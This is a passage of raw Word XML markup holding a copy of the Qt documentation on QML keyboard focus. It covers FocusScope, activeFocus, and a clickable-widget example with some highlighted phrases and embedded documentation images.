          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the last type</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will have the focus and the others are unset, similar to when there are no focus scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When a focus scope receives active focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the contained type with</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set (if any) also gets the active focus. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If this type is also a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2253" w:history="1">
        <w:r w:rsidRPr="00C62FB3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proxying behavior continues</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Both the focus scope and the sub-focused item will have the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>activeFocus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property set.</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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that, since the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2254" w:history="1">
        <w:r w:rsidRPr="00C62FB3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type is not a visual type, the properties of its children need to be exposed to the parent item of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2255" w:history="1">
        <w:r w:rsidRPr="00C62FB3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Layouts</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and positioning types will use these visual and styling properties to create the layout. In our </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,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Column</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type cannot display the two widgets properly because the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2256" w:history="1">
        <w:r w:rsidRPr="00AB23A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lacks visual properties of its own</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The MyWidget component </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directly binds</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties to allow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Column</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type to create the layout containing the children of the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2257" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FocusScope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So far, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the second component statically selected. It is trivial now to extend this component to make it clickable, and add it to the original application. We still set one of the widgets as focused by default. Now, clicking either MyClickableWidget gives it focus and the other widget loses the focus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The code that imports and creates two MyClickableWidget instances:</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle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id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window</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"white"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240</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height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150</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Column</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anchors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centerIn</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parent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spacing</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15</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MyClickableWidget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focus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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//set this MyWidget to receive the focus</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"lightblue"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MyClickableWidget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"palegreen"</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The MyClickableWidget code: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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FocusScope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id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scope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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//FocusScope needs to bind to visual properties of the children</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property</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alias</w:t>
      </w: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color</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x</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x</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y</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y</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height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height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Rectangle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id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rectangle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anchors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centerIn</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parent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"lightsteelblue"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175</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height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25</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radius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10</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antialiasing</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Text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id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anchors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centerIn</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parent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focus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Keys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onPressed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Key_A</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A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else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Key_B</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B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else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if</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>event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key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Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key_C</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label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text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'Key C was pressed'</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MouseArea</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anchors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fill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parent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onClicked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scope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focus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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus4.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1057" type="#_x0000_t75" alt="" style="width:180.3pt;height:115.2pt">
            <v:imagedata r:id="rId2258" r:href="rId2259"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C62FB3" w:rsidRPr="00C62FB3" w:rsidRDefault="00C62FB3" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu better portability using focus scope.</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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:r w:rsidR="00C62FB3" w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2260" w:history="1">
        <w:r w:rsidRPr="00C62FB3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C62FB3" w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly relinquishes focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (by setting its</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focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</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false</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">while it has active focus), the </w:t>
      </w:r>
